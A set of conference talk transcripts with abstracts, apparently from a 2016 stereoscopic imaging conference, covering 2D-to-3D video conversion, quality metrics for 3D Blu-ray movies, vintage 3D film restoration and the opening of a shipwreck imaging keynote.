happens now if we just do a straightforward depth interpolation between the first and the last frame for this particular scribble, that's when we might come to perceptually incoherent results as shown here because here the depth value that's computed for the dragon on that intermediate frame it actually indicates that the small dragon is still behind the bigger one, behind the big dragon whereas the input video shows us that the inclusions in the input video show us that it's actually the other way around. So that's an undecided effect that might come from a very straightforward depth interpolation and in our algorithm we want to cope with that. Some of the related literature I'll just shortly mention, we start out with a video object segmentation algorithm that we extend to work as a 2D to 3D conversion algorithm. There are three competing algorithms listed here, reference one, work by Goodman, three by Fun and four by Eventchich. So we'll compare our results to those three algorithms and the last two references they refer to data sets that we are using in our test. It's the Cintel and the new to Kuba data set. So let's now come to the algorithm itself. This is an overview. It contains several blocks, I'll just focus on the most important ones and probably the most important one that's the cost volume filtering block here. So based on the initial scribbles provided by the user, then we are able to construct a cost volume that's based on color histograms from the input image, especially from those pixels that were covered by the user provided scribbles and we do a filtering of the cost volume and edge preserving filtering using the guided image filter to come up with a filtered cost volume and then finally there's a depth assignment block which outputs the final 3D video. And here is one feature that's important to us. It's this temporal coherence block. I'll show on the next slide what we did here as opposed to conventional stationary filtering where the filter window is placed at the center at the same pixel in consecutive frames. We first do an optical flow computation and then we use the motion vectors to displace the filter window according to this observed motion. So that's one feature of the algorithm. There are several other blocks which I'll just mention very shortly. STC, that's a spatial temporal closeness constraint and CON, that's a 3D connectivity constraints and these two constraints that help us limit the influence of the user provided scribbles onto those pixels that are located in the vicinity of the pixel or those pixels that appear spatially connected in 3D space to the initial pixels. And here is now DC is the depth change model. That's the part that tries to take care of the perceptual inconsistencies which I explained in the beginning. And the basic idea of this module is that we do a detection of occlusions based on motion vectors and these occlusions then help us determine the right depth order of individual segments. That's shown in some more detail here. So we have an intermediate frame of the input video and the colors here in this segmentation, they actually correspond to the colors, the user provided colors which mean depth values in the very first frame. And from this, from the optical flow vectors, I mentioned we derive occlusions, they are computed by detecting inconsistencies between the forward and backward optical flow and the motion vectors also give us information on which segment is in front of the other one. And this directed occlusion is shown by the errors here. So for example, this area is pointing from the light blue to the red area, so that means that the red segment is further in the back and it's partially occluded by the light blue segment. And a similar situation arises here where this little dragon which was annotated in yellow at the beginning which is partially occluding already the light blue region. We can now use this information, this partial occlusion information to construct a graph, it's a noncyclic directed graph, the nodes here correspond to the segments shown here, the edges encode this directed occlusion information and furthermore from the first frame and in some cases also from the last frame we have depth information, so in some cases the depth is fixed when the object wasn't found to move in depth, in some words in some cases like for the yellow, the dragon here, there is a depth range that was derived from the user's scribbles in the first and in the last frame. And we can now use the information in this graph here to automatically refine the depth information to derive some depth constraints for each intermediate frame and the important thing is that these newly computed depth constraints, they are consistent with the occlusions that we observed by our motion detection. So that's the basic idea of this algorithm, of this part of the algorithm, that's what I said already and let's now come to the evaluation part. So how did we set up our experiments? We had a range of test data, some of them were computer generated test data, especially the Sintel dataset and the new Tsukuba dataset and those synthetic data they came with ground truth information from the Sintel, we had the ground truth optical flow information and then we also had ground truth depth information, so that's important, the depth information for validating our approaches. So for the synthetic data, the reference, we had synthetic depth data of course and then we had also some self-recorded scenes for which we could compute stereo derived depth and in those cases we used the stereo derived depth as reference. So the scribbles were then initialized with the values from the depth reference, so that's a little bit different for the evaluations and then we carried out a quantitative assessment with test of the effects of different modules of our algorithm, the effect of the motion guided filtering and also the sensitivity to optical flow results. So let me now show some of the results. First regarding the perceptual coherence, that's the example I showed in the beginning, where we have the input frames, here the ground truth depth values and as I already pointed out in the beginning, there are some perceptual incoherences regarding occlusions if we just use linear depth interpolation and with our depth order guided interpolation we were able to correct these perceptual incoherences. Then we did quite a thorough evaluation by switching on and off different sections of the algorithm, different modules, so I won't explain all of that in detail, just give a broad overview. The orange results here, they were computed without considering the depth changes of the objects and then the greenish results here, they did a straight forward linear interpolation and the blue results here, the depth order guided interpolation. So in that case, the results, actually the depth order guided interpolation didn't improve the quantitative results, however, this was a test using ground truth optical flow, optical flow is used at several steps of the algorithm and if we now use switch to estimated optical flow which of course has some errors included, then we see that now the depth order guided interpolation also delivers quantitatively results that are quantitatively a little bit better than the straight forward linear interpolation. And what we can also see here, we have here TC refers to temporal coherence, that's the motion guided filtering and in all cases both for the estimated and the ground truth optical flow, the motion guided filtering was able to improve the results. So this is a comparison to three other algorithms and if one takes a look at these figures here in more detail, we find that our results which are coming to versions, the winner takes all and depth blending, depth assignment scheme, basically we outperform algorithm one, our good man in most of the cases, the same applies to the algorithm by Fenn and we are about, we deliver very similar results to algorithm four, so in four or five of the 11 test cases we outperform them. So that means in summary the results of the algorithm are competitive with other state of the art algorithms and finally this is just a visual example of how the algorithm can improve the depth interpolation, so we have the ground truth results here, the results by Fenn they have some inconsistent, some artifacts here in the depth reconstruction for example on the shoulder here and also the algorithm by Eventchich has similar artifacts on the head of the statue here whereas our result seems to deliver the visually best results. So that brings me now to the end of the talk just to summarize very quickly, I've presented a semi-automatic 2D to 3D conversion algorithm, it takes a step towards the generation of perceptually coherent depth maps, we took special care to incorporate motion based occlusion information to generate those that perceptual coherence, then the inclusion of motion guided filtering led to an improvement on the average of about 16% and the results were quite comparable to other state of the art algorithms. So what we might take a look at in the future, what we haven't done so far is we didn't care about the efficiency of the implementation so there's clearly room for improvement in this aspect and also regarding the initial scribble matching strategy which I didn't cover in detail and now there's some room, some possibility for improvement in terms of additional user support. So that brings me to the end and thank you very much for your attention. Thank you.
|
We propose a semi-automatic 2D-to-3D conversion algorithm that is embedded in an efficient optimization framework, i.e., cost volume filtering, which assigns pixels to depth values initialized by user-given scribbles. The proposed algorithm is capable of capturing depth changes of objects that move towards or farther away from the camera. We achieve this by determining a rough depth order between objects in each frame, according to the motion observed in the video, and incorporate this depth order into the depth interpolation process. In contrast to previous publications, our algorithm focuses on avoiding conflicts between the generated depth maps and monocular depth cues that are present in the video, i.e., motion-caused occlusions, and thus takes a step towards the generation of perceptually coherent depth maps. We demonstrate the capabilities of our proposed algorithm on synthetic and recorded video data and by comparison with depth ground truth. Experimental evaluations show that we obtain temporally and perceptually coherent 2D-to-3D conversions in which temporal and spatial edges coincide with edges in the corresponding input video. Our proposed depth interpolation can clearly improve the conversion results for videos that contain objects which exhibit motion in depth, compared to commonly performed naïve depth interpolation techniques. © 2016, Society for Imaging Science and Technology (IS&T).
|
10.5446/32255 (DOI)
|
Okay. Hello, everybody. I will describe our results and we'll announce a lot of our other results because we have very limited time in this pretty funny project. Okay. You know that currently it's a big problem in industry because as Forbes wrote, it's great 3D fiasco and 3D guys kill their own cash cow. It's bad news generally, but it's good news that looks like currently it's possible to solve more and more problems that cause low quality 3D. And when we talk with guys from science and guys from industry, looks like these guys live in different universe. So this is one world of guys from Australia, and so on, and another world parallel, absolutely the parallel world of guys, of scientists. And it's a very big question how to make bridge through all these walls and we try to do this. Okay. What we do? This is our project team and this is Blu-ray disks that was analyzed. We analyze all Blu-rays, all 3D Blu-rays with a budget noted on IMDB.com. This means that this is all non-documentary Blu-rays. And we measure trends and we work in this area, in area of measurement of quality of 3D, the light last eight years. So this is a pretty long project and we measure 3D quality previously, but there was very common question, you measure some will you? Is it good or is it wrong? What can you comment this? And currently we can answer to this question and we can consider different values. Also we propose new metrics, we create a challenge match metric and publish results something like four years ago. But currently we create practical challenge match. This means that it's become approximately 100 times faster and more robust simultaneously. So it looks like we are the first guys in the world who create a practical challenge match metric that's so fast that it's possible to measure 100 movies. And also we create new temporal sheets metric and update other metrics and so on and so on. Oh, okay, prolaxis. Everybody know here what's this. And we analyze movies and you see very, very, very big parallax on big screen, your eyes will be damaged. And we measure trends and you see here trends on 100 movies during last years. Here is zero level. It's negative parallax, it's positive parallax. So it's closer to viewer. It's behind screen. And this is level of avatar. And this is values of front object and first object in scene, average value for movie. So you see how good depth, how good visible depth have different movies. And this is trend lines, trend lines and bad news that you see that depths become smaller and smaller and smaller. Here was avatar and you see that after avatar we can see movies that sometimes have four or three times less visual depth than avatar. This means that this movies will have good perceptive depth only in cinema. And when you will buy this Blu-ray, like we are, and try to see this Blu-ray on small screen, visible depth will be very small. Be careful. So it's better to go to the cinema. Okay, and there are a lot of other interesting results after this analysis, but anyway, let's move forward. This is, by the way, this is all movies sorted by visible depth. And you can see red color mean converted movie, blue color mean captured movie. And you can see, of course, most of converted movies have small depth, every professional understand why. And this is avatar. And this is Titanic. Titanic have one of the best visible depth in comparison with all other converted movies. Really, really great job. Really great job. And that's why people go to the cinema, see avatar, see Titanic, see clearly visible depth, clearly visible, and enjoy. And you understand that people who will go to this movie, for example, you understand. So I just unknown this result, we also analyze general histogram of depth in movies and red color again, converted movies. And you can see that many converted movies have not so... Have some strange steps in depth, so it's interesting to analyze how this not so smooth depth will decrease your visual performance of 3D movie. Okay. So, as I told you, it looks like we have first guys who create practical channel mismatch measure. And this measure can find not only fully swappered views, but also some special effects that put it on wrong depths. For example, here you can see this guy's on first plan, and this candle on the background and this special effect put it at the depth of candle, so at the background. But obviously in front of this guy. So at this moment, you will see absolutely impossible picture. And your brain will be damaged a little bit. And of course, we find several things with absolutely swappered channels. Here is also absolutely swappered channels. And this is histogram of movies with swappered channels. Good news from this analyzed 100 Blu-rays, 23 have at least one scene with swappered channels. So 21% probability that you will see at least one swappered channel in movie. So enough big. And good news that the biggest amount, the biggest percentage of such movies was in 2010. And I suppose that you understand why a lot of guys appear in this industry who never previously worked with stereo. And percentage of such movies here was even bigger for previous movies. And currently, this parameter become lower and lower and lower. So I suppose that with our metric, this will be zero in future. It's possible. And why? It's a good reason to do this. And we also analyze visual discomfort for the scene. And currently, we are able to predict in short words. We can predict visual discomfort from scene with swappered channels. Because if this duck scene, if this shot scene, if this flat scene, visual discomfort from swappered channels will be lower. And it's possible to predict this. And this is trend line for my presentation is about trends, you remember. This is trend line for channel is much by release date. And we see that unfortunately some movies may be not so good, but generally, situation become better. And the same situation with the budget. Of course, commonly, so opportunity have movies with smaller budget. That's the understand why. Okay. Color mismatch. Everybody understand what this is? And here are some samples. For example, like this. So 3D or journey. Also clearly visible. Color mismatch. And on trend line, we can see that generally, situation become better, fortunately. And it's interesting to analyze resident level first and second. We see that situation become better. And step up situation also become better. So situation become better. But of course, maybe we have good question to not so good movies now. And generally we can see that this is avatar. This is avatar. And we see that avatar was one of the best movies when it was released. But currently level in color mismatch for avatar become in red zone for now. So I'm absolutely sure that avatar to 0, to 0. It will be essentially better than first one. And the same analysis for budgets. Of course, low budget movies have lower values and high budget movie are accurate. And you can see that avatar is the worth on this parameter in comparison with all high budget movies. So this means that new high budget movies are more accurate than avatar. Good news. And by the way, here we can see that some low budget movies have the same parameters as high budget movies. So currently it's possible to create even low budget movies on the same level of quality. So again, good news. Special symmetry. Everybody understand what this is when we see something like this. And generally this is not so painful but not so good. And again, timeline. And we can see that step up becomes naturally better from one to 10. And resident evil have the same values. So it looks like these guys began to use new technologies and these guys have not. And if you will analyze by budget also, of course, the same situation a lot of. And by budget you can see that step up, move it from red zone to green zone for this budget. So it's interesting analysis. Rotation. Currently we began to analyze separately. Rotation, zoom and other things because even small, generally a small shift, vertical shift is not so big problem. But when it's rotation, even for one degree, it's really painful. And you can see, for example, rotation here, shark knight. And rotation here, silent hill, crazy rotation. By the way, here you see that we show the worst sense and you maybe see that it's very common situation when this is horror movies. So we prove that this movies will be not only scary but also painful. Okay and again release dates. And again, step up. You see that step up was here in red zone and become essentially better than resident evil. Unfortunately not. And here is situation for budget and you see that again avatar have one of the worst values currently. Scale mismatch. Here is, we was really surprised how many scale mismatch sense was in computer graphics. And Piranha, space station again computer graphics. Guys. Start track. Again computer graphics. Crazy. And fortunately situation become better and the same situation on budget. Sharpness mismatch. When you see sharp, it's really painful and the same situation become better. Temporal shift. Pretty funny things. It's now a new metric. You see clearly visible. Temporal shift. Hugo, also clearly visible temporal shift. Step up. Clearly visible temporal shift. It's we found more than 500 scenes with temporal shift. So pretty big amount. By the way, it's funny. Very fast. I motion. And again situation. We can say that situation become better in temporal domain and in budget chart. And we create our reports. Currently it was published. And we have something close to 3,000 page in this reports. And report thousands of problems. A lot of downloaded, 28 contributed stereographers, their names. And next report will be published soon. Maybe in first quarter even. And we plan to reports during this year. And we have a lot of plans. And our goal is to predict fatigue by movie. So to predict percentage of disappointed viewers. It's very ambitious and challenging goal. But we move in this direction. And this you see that it's composite with 3D bluradisks. We see that no pain will be good gain for this industry. Thank you very much.
|
1) OBJECTIVE: The main objective of the large-scale quality analysis of S3D movies is to gain a better understanding of how quality control was performed in different movies. Also several novel quality metrics are presented, including channel swap detection, evaluation of temporal shifts between stereoscopic views and depth continuity. 2) METHOD: The main technical obstacle that we had to overcome was an enormous amount of computation and disc space required by such an analysis. Evaluation of one movie could take up to 4 weeks and required over 40GB for the source Blu-ray only. To maximize the efficiency we had to rewrite all of our metrics to exploit the multicore architecture of contemporary CPUs. We have also developed a system that efficiently distributes the computations across the cluster of up to 17 computers working in parallel. It enabled us to finish the evaluation of 105 movies in about 6 months. 3) RESULTS: An evaluation of 105 S3D movies’ technical quality has been conducted that span over 50 years of the stereoscopic cinema history. Our main observations are as follows: According to our measurements, “Avatar” in fact had a superior technical quality compared to the most S3D movies of the previous decade. So it is not surprising that it was positively received by the viewers. S3D quality improvement over the years is fairly obvious from the conducted evaluation, e.g. the results of average-quality movies from 2010 correspond to the results of the 2014 movies with nearly the worst technical quality. A more important conclusion from the analysis, however, is that it gradually becomes possible to produce low-budget movies with excellent technical quality, that was previously within reach only for high-budget blockbusters. We hope that new objective quality metrics like the channel mismatch metric will find their applications in production pipelines. It can further decrease the number of viewers experiencing discomfort and give a start to the new surge of S3D popularity. 4) CONCLUSION: Objective S3D quality metrics make it easier to find problematic frames or entire shots in movies, that could potentially lead to discomfort of a significant fraction of the audience. Our analysis have already revealed thousands of such scenes in real S3D movies. But to directly estimate this discomfort subjective evaluations are necessary. We have organized several of such evaluations with the help of volunteers, that were asked to watch some of the scenes with the worst technical quality according to our analysis. These experiments allow us to further improve the metrics and to develop a universal metric that could directly predict a percentage of the audience experiencing a noticeable discomfort. It is already clear that the development of such universal metric is a very challenging problem, so we are looking for collaboration. It is also clear to us that the majority of problems could be fixed in post-production with minimal user intervention, if not entirely automatically. Some of these techniques are not widely employed just because the problem itself is not considered important enough to require correction. We hope our work could help shed the light on the problem and more attention will be drawn to correcting the S3D production issues. © 2016, Society for Imaging Science and Technology (IS&T).
|
10.5446/32256 (DOI)
|
Welcome everyone to the second keynote for the stereoscopic displays and applications conference. The title of the presentation is 3D movie rarities. The presenters are Bob Fermanic and Greg Kintz. Now, Bob's had a bit of a just a health hiccup, so he wasn't able to travel at a rather short notice. So Greg Kintz is very kindly agreed to stand in as a sole presenter rather than a joint presenter. Greg Kintz has been working with 3D for, well he says nearly 15 years but I'm sure it's more than that. It's been more than that. Yes. With the archive, yes. Oh, with the archive, of course, yes. I've known Greg since he was working for one of the TV stations and has been keenly interested in 3D through all of that period and got involved with Bob Fermanic and the 3D movie archive, sorry, the 3D film archive and has since been working on a number of restorations including Dragonfly Squadron, the bubble, the 3D rarities which we're discussing today and in fact we've got some of that disc for some of the awards that we're giving away on Wednesday afternoon and also the mask. So it's incredibly important work. Once you lose these films, they're gone forever. So these are a very important part of the history of stereoscopic imaging. So at that point I'll hand over to Greg. Thank you. Hey. As the inter mentioned, I'm the technical director for the 3D film archive and Bob really does wish he could be here today. He's the founder of the archive and he started out which we'll discuss later back in the early 70s and 80s when 3D films were not being taken care of and considered a bygone thing. I'll do my best to try to stand in his shoes and convey the efforts that we continue to do to save these features and preserve our stereoscopic film heritage. We both share an immense love and appreciation for this amazing art form and the dire need to save these films. So let's get started. The first documented public exhibition of a 3D feature took place on June 10th, 1915 at the New York Aster Theater in Times Square. Only three reels of test footage were shown and by all accounts it was on a dual 35 millimeter projected system in anaglyphic form. The test footage was on nitrate stock which nitrate by today's standards is considered very flammable and not something you'd want to keep around at least in normal conditions. Original trade magazine reports indicate there were motion artifacts and most likely that was either due to the dual projection system being out of sync or it was due to original phasing issues in the original dual camera rig. We'll probably never know the footage which was shot almost 101 years ago does not survive and unfortunately was not considered important by its presenters. About 1922 color film stocks which have been developed which allowed for anaglyphic printing on one strip of 35 millimeter film and there were a number of shorts shown theatrically in the mid 1920s. The first 3D feature ever was the power of love. Sadly, these pioneering stereoscopic productions are gone with the victim of studio apathy and again volatile nitrate film stock which was highly encouraged to be destroyed for a period of time. However, we have been able to preserve the earliest extant footage from the 1922 Kelly's Plasticon features. This remarkable 3D footage of Washington in New York City has been restored and extracted from the original anaglyph in left right form and is now available on our 3D rarities blu-ray collection from Flickr Alley. The anaglyphic shorts were a novelty and fell out of favor by 1926. Not much was heard from 3D over the next decade but exciting things were happening behind the scenes. Edward H. Land was a scientist and inventor and he co-founded the Polaroidcom Corporation. He developed a new method of polarization that could be applied to motion picture film leading to the first public exhibition of polarized 3D which took place on January 30th, 1936 in New York City. The polarized 3D system demonstrated by Land 80 years ago at its core is not too unlike the systems used today in IMAX film based 3D presentation which are still for the film based systems dual projection and linear polarized. The advent of polarized 3D projection allowed for sharper images with less potential crosstalk that also introduced the possibility of full color stereoscopic images. It is this new beginning in 3D film history that we'll be looking at here soon in the first part of our presentation. Thrills for You was the first polarized 3D film shown on the West Coast when it opened here at the Golden Gate International exhibition in May of 1940 and in a few minutes after 75 years it will return home and play here again. This Pennsylvania Railroad short was expertly photographed and for a film shot in 1940 you'll quickly see how the early stereoscopic features expertly used 3D staging. They watched their parallax budget and overall framing in order to have 3D actually enhance the film versus simply being used as a gimmick. Be sure to watch the last shot even with the clever editing. You'll see that Norelean 3D camera rig is probably a little too close to the tracks. So that's one of my favorites. The next feature in our presentation is New Dimensions which is historically significant as the first domestic full color polarized film. It opened in New York's World Fair in May 1940 and marked the first time a color polarized 3D film was shown publicly. The stop motion assembly of a full size Plymouth took nine weeks to photograph and by the end of the fair in October of that year 4.5 million viewers had seen the film. Regrettably the elements for this entertaining and historically significant film were terribly neglected. In 1953 RKO acquired the rights and decided for theatrical release it would be edited down and the trims were discarded. The shortened version was released in the early 1950s as motor rhythm. 3D film founder Bob Furmanek rescued the only surviving left right elements but they were rapidly deteriorating with vinegar syndrome, a process that breaks down the base of the film and eventually destroys it. Knowing this was a vital one of a kind element in time was of the essence. Bob had wet gate 4K scans made of the archival element. That process ended up taking numerous passes to capture the shortened entirety because the scanner which was a 4K wet gate scanner and one of the top in the country was having problems due to the shrinkage as the film was deteriorating. So we had to do a number of passes to get the complete feature intact. In order to restore the film to its original 1940 version Bob located the only surviving 1940 opening and closing sections in a 16 millimeter print. We have now restored and preserved new dimensions in its original complete edit as first shown in the World's Fair in 1940. And on a side note you'll see those bookend segments having a slight drop in deterioration being from an archival element 35 millimeter which is the main body of the feature to the bookend segments which are 16 millimeter. I should mention that both of the shorts you're about to see were done by John Norling and Jacob Leventhal, two pioneers whose work in stereoscopic motion picture of the field date back to the early 1920s. After the two shorts I'll do a quick rundown on the archives history to some of the myths we've had to combat along the way and I'll discuss some of our recent restoration projects. 75 years ago looking as good as it does and the technical work done behind that. Just a quick heads up if any of you guys are thinking about some of those amazing polarized tricks don't tear up your glasses yet because we have some more coming up here soon. Going on the golden age features of the 1950s highlight a variety of comparisons in today's state of the art 3D digital fair but each time period in 3D we feel is unique. The vintage 3D titles offered more parallax thanks to wider interaxial settings and in addition the 1940s and 50s features tended to have longer takes and not as rapid cut editing as today's features do and that also allowed for wider parallaxes to be viewed more comfortably and easily and allowed for better staging. Contrary to popular cultural references have existed since the early 1980s every single one of the 1950s domestic golden age features were shot in digital interlock dual 35 millimeter 3D. In tradition of 3D public relations it seems part of any upgrade in 3D technology has included an underlying need to dismiss all previous attempts and to that end we have strived to set the record straight. Most of the vintage 3D titles have had A-list stars such as John Wayne, Vincent Price, Robert Mitchum, Barbara Stanwyck, Dean Martin and Jerry Lewis, Edward G. Robinson and Rita Hayworth. Just to name a few legendary directors also just a few Raul Walsh, Douglas Sirk and Alfred Hitchcock all worked on 3D features. Typically the production budgets were on par with their 2D counterparts and even lower budgeted 3D features showed great thought and care in their 3D production values. The primary culprit in the rapid decline of the box office was the theatrical projection. In the fall of 1953 Polaroid field studies determined that nearly 50% of all 3D presentations were there shown out of phase or out of sync. And to put that into further context if you have a film one frame out of sync that can already cause eye strain and irritation you get two frames out of sync and then you start having some serious problems and a number of features were actually halted midway through and run in 2D. And the premier theater which Dial-In for Murder ran at for the reviewers the 3D projectionist had issues, ran it out of sync, ran the other half flat, the reviewer tore it up and Warner Brothers said we advise that you run Dial-In flat. So even the shutters on the projectors had to be precisely in phase. If they weren't in phase as you've probably seen before you know you can have a watery effect with motion. After the audience had been burned out a few times they were not ready to go back and pay money and get more headaches and Polaroid to their credit had worked on synchronizers and aids to help projectionists but by that time the damage had been done. Just to explain on how the 3D archive began in the 1970s nearly a dozen golden age features were converted to anaglyphic form for theatrical release, television broadcast and home video on Betamax and VHS. The vastly inferior anaglyph conversions were easier to present and required far less technical expertise. This began as early as the 1970s when Universal released it came from outer space and Creature from the Black Lagoon. The plus side is you don't need a silver screen, you don't need special equipment. The downside of course is it was anaglyph. And as a result the surviving dual strip 35 millimeter prints began to disappear and Bob had seen that trend in 1978 he was able to watch it came from outer space in dual 35 millimeter and polarized 3D and a year later it ended up not being the case but he was told there was a new print that only required cheap red and blue glasses and no special equipment was needed. So Bob starting in 1980 he recognized the disturbing trend to do what the other studios had not the foresight to do. He began actively seeking out and preserving these precious dual strip prints and elements often at great cost and personal expense. He accumulated a large number of left right prints in order to assemble a complete 3D pair and to spell that out even better the left right prints had a soundtrack so they could literally be split apart for second run theaters and you doubled your amount of prints for a given title and in the process sometimes real one and real two might be left then it goes to right and in situations where there were no 3D elements available Bob would buy it prints in the hopes of finding a given real. He accumulated a large number of left right prints in the effort to assemble a complete 3D pairs as many were separated as I mentioned in their 2D run. Many of Bob's discoveries and restorations are still one of a kind it would not survive today if it wasn't for his efforts and ultimate creation of the 3D film archive by 2003 the 50th anniversary of the 3D boom the archive held the largest collection of vintage stereoscopic film elements in the world. Our collective goal has always been the same to not only preserve these titles but to have them available to the public and presented better than ever before without the constraints of analog film alignment issues. What once took several optical generations on film can now be done better and with no loss of quality in the digital realm. The same applies for left right level matching which was harder to achieve in the film domain. Each of our 3D restorations has literally been a shot by shot alignment issue or alignment corrections fixing not only vertical and sizing issues but also addressing various geometric distortions that could be introduced by the camera rig or somewhere in the post production chain titles that we have restored include the bubble dragonfly squadron the mask 3D rarities and more to follow all are currently available on 3D blu-ray. We've worked with and advised various studios on their stereoscopic assets. Our most recent restoration was also our toughest. You'll soon see a sample of the obstacles that we had to face on our last latest restoration which is a 1954 sci-fi drama called Gog and it actually goes further than our restoration efforts in that the film the rights to it were sold just a few years after it ran in 1954 and as a result of that the original left eye camera negative and all remaining elements were destroyed and Bob Furmanek in I want to say 2000 2001 almost 50 years after the feature first ran in 3D discovered the sole surviving left eye print. That was the good news of the bad news was the left eye was in path a color which for anybody out there who's in the film know they know that path a fades and fades badly. So when we had a chance to do our restoration we knew we were going to have a dawning task ahead of us and you'll see that here soon. And following the Gog restoration demo is an outstanding and Miller sequence from the classic 1954 MGM musical Kiss Me Kate. It's a tremendous it was a tremendous box office hit and we are proud to consult with Warner Brothers on this restoration. Kate is available on 3D Blu-ray and is highly recommended thanks to the hard work of Ned Price and the Warner Brothers motion picture imaging division. Hi my name is Greg Kintz I'm the technical director for the 3D film archive. I hope you have your 3D glasses handy as we go through some of the hurdles we went through restoring the 1954 3D classic Gog. Hi I'm Bob Furmanek founder of the 3D film archive. Like all the 1950s 3D films Gog was shot in dual strip 35 millimeter and exhibited in dual projection 35 millimeter and polarized 3D. It was filmed with the natural vision 3D rig which was used to film such 3D classics as Blonde a Devil House of Wax the Charge at Feather River and several others. The plus side of twin 35 millimeter 3D is the quality is essentially the same as standard 2D 35 millimeter and either of the two release prints can easily be shown in flat if needed. This was also the downfall as both left right release prints and archival elements could easily be split up or one side of the master elements could eventually be discarded. This ended up being the sad case for Gog where after its initial run in 1954 all 35 millimeter left eye prints and archival elements would essentially disappear. Outside of some very compromise 60 millimeter elements literally all high quality left eye 35 millimeter elements of this feature were considered lost for almost 50 years. In 2001 we found the only surviving 35 millimeter left side element of Gog. It was an original 1954 Pathé cover release print and it was totally faded red. That left side was paired up with a right side print that had better color and it was shown in 3D for the first time in more than half a century at the World 3D Film Expo in Hollywood. Director Herbert L. Strach was very proud of his work on the film. Much like the one eye director Andre De Toth, Herbert Strach suffered from an ocular vision and because of this he relied heavily on low thrift worth for overall stereoscopic compositions and advice. In later interviews Lothar Worth would consider this one of his best 3D features. By the time Gog went into production in September of 1953 the Natural Vision rigs had their viewfinders configured for widescreen framing and many of the technical issues found in earlier Natural Vision features had been resolved. Again paralleling the feature House of Wax Lothar Worth made sure that Gog relied on well thought out stereoscopic parameters such as staging, color and camera positioning to highlight depth while still utilizing out of screen effects that were weaved into the storyline. After its an original theatrical run in vibrant color widescreen 3D, Gog suffered through less than ideal presentations in the upcoming decades often being shown on television in black and white, improperly framed and taken from subpar prints. It was never again shown in proper widescreen or 3D. The recovery of this lost 35mm element was a true cause for celebration but it was also very apparent that this left eye print was turning pink and any trace of remaining color was fading rapidly. In 2015 the archive was asked by Kino Lorber to begin restoration work for a 3D Blu-ray release and we requested new scans. The last transfer of the right eye had been done in the 1990s in standard definition so Kino was able to secure MGM's archival right side IP for a new HD scan. MGM had recognized the need to preserve this 35mm left side and with the cooperation of David Packard and the UCLA Film and Television Archive they were able to make a new scan of the last 35mm left print. Gog was shown on television in a modified full frame flat black and white version and it was obvious that that was never the intended aspect ratio. When we did new scans of the archival elements microphones set pieces and various hard matted stock shots shown that the film was clearly intended for widescreen presentation. With some finesse the archival right eye IP print cleaned up extremely well but the left eye print was in bad shape and simply borrowing color from the right eye was not an option. Using our various stereoscopic recovery methods which we've refined over the last 15 years we worked first on recovering some basic color back in the left eye side and then spent considerable passes refining that process. While it is not always 100% match I'm sure you'll agree the end result was nevertheless a night and day difference over the original surviving left eye release print. We've also worked on recovering some lost blown out detail that is present in MGM's right eye inner positive archival element. Another unique trait that only survives in the left eye release print is an additional 3D production credit during the opening titles that is absent in all other surviving elements. This omission has been reinstated into the restored 3D and 2D versions. In late August of 53 interest in 3D was starting to decline primarily from sloppy presentations. Shortly before cameras rolled on GOG Gunsberg suggested to producers that all 3D features begin with flat titles. This would help projectionists to frame left right prints correctly and reduce chance of eye strength. Both the left and right eye elements had their share of dirt and damage sections as well and thanks to the additional assistance of Fad Kamarowski these issues have largely been eliminated. When I was a kid seeing GOG in 3D was a holy grail. The only way you could see it at that time on television was flat black and white full frame and it robbed the film of all the special qualities that make it such a high quality and unique 3D feature. When we found the print in 2001 we weren't sure we could ever restore the color to it and bring it back to the quality that exists now. So it's a real thrill for Greg Kintz and myself to be able to present GOG to you as Herbert Elstrak and his entire creative team intended. Thank you very much and enjoy GOG. Good stuff. Yeah in my opinion Kiss Me Kate's one of the best 3D movies from the 50s. Right now I'll open this up for questions. Well I might just finish off by saying this is we're so privileged to be able to see these old features better than they were ever seen in theaters. So thank you for the work for you doing. Please join me in thanking Greg for his presentation.
|
Stereoscopic motion pictures have existed for 100 years, and the 3-D Film Archive - founded in 1990 - has a key role in saving and preserving these historic elements. Greg Kintz will discuss the many obstacles and challenges in locating and saving these precious stereo images. For example, their scanning, panel-matching, and stereoscopic image matching techniques have been widely recognized for their efficiency and precision. As Greg will present, the full restoration process begins with 2k or 4k wet-gate scanning of the best surviving 35 mm elements. The films are then aligned, shot-by-shot, for precise alignment and panel matching of the left / right elements. The 3-D Film Archive's multi-step process also includes image stabilization, flicker reduction, color balance, and dirt clean-up. At one time, the 3-D Film Archive held the largest collection of vintage stereoscopic film elements in the world. As such, Greg will display some of his favorite clips on the SD&A stereoscopic projection screen. In addition, the Archive's first four releases on Blu-ray 3D have enjoyed acclaim: Dragonfly Squadron, The Bubble, 3-D Rarities, and The Mask. For the first time, contemporary viewers are able to see these films at home in quality equal to or greater than the original theatrical experience. Greg will also discuss how the Archive is working to save and restore additional Golden Age 3-D films through licensing and partnerships. © 2016, Society for Imaging Science and Technology (IS&T).
|
10.5446/32257 (DOI)
|
So, our next speaker is the keynote speaker for the first keynote speaker for the conference this year. He may be well known to many of you unless you came in the last two years because he wasn't here. But he was very busy doing what he's going to talk about this afternoon, which is the two ship wrecks, two and a half thousand meters underwater with six 3D cameras. Dr. Woods is a research engineer at the Center for Marine Science and Technology. And as of two years ago, manager of the high facility, the two, which is a very nice 3D display system. It says here he has a strong background in stereoscopic 3D imaging. I think he has an excellent background in stereoscopic 3D imaging, not just a strong background. And if you have any questions about stereoscopic 3D, sit next to him at the dinner tonight and ask away. And he's done lots of things which we're going to learn about right now, I believe. Andrew. So, thank you, Nick, for the introduction. My talk today will be about a project I've been working on for the past four years and was the result or was the cause of me not being able to attend the last two conferences. So that had a negative effect on my attendance percentage. Prior to that, it was every conference but two. Now it's every conference but four, which makes it 23. All right, so I'll be talking today about a project relating to shipwrecks, the HMA of Sydney II and the German vessel, the Cormorant, which are sitting at 2,500 metres underwater and we took a huge suite of equipment to conduct a 3D imaging survey of the two vessels. Taking you back to World War II, the 19th of November in 1941. This is just a few weeks before Pearl Harbor. These two ships were in the Indian Ocean and unlikely encounter it was. No one expected a German raider to be located in this part of the world, on the west coast of Western Australia. The German vessel, the Cormorant, was trying to establish basically a bit of a distraction from what was occurring in Europe so that the Allies could not just send all of their vessels to Europe to fight the war there. So the Cormorant was moving around, creating a bit of distraction and ensuring that the navies around the world had to keep some of their vessels in the home waters. So the Cormorant was a merchant vessel originally and it was outfitted with a wide range of heavy artillery. The Sydney II in contrast was specifically built in Newcastle upon Tyne, Nick, to be a leading class warship of the time. The German vessel was at the time getting ready to lay some mines in a port on the west Australian coast and the Sydney was heading down south, heading down from Singapore, heading back down to Fremantle and encountered this unusual vessel that 